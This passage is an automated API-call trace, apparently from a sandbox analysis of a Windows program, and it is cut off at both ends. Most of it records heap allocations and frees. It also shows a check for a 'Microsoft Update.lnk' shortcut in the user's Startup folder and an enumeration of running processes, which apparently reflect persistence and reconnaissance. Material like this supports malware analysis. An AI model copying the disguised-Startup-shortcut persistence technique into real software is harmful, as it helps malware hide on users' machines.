hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0314.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0314.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0314.278] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0314.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0314.279] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0314.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0314.279] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0314.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0314.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0314.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0314.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0314.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.280] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0314.281] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0314.281] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0314.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0314.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0314.283] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0314.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0314.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0314.285] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.285] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0314.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0314.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0314.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0314.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0314.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0314.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0314.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0314.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0314.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0314.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0314.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0314.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0314.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0314.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0314.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0314.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0314.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0314.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0314.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0314.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0314.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0314.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0314.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0314.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0314.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0314.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0314.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0314.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0314.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0314.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.323] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0314.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0314.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 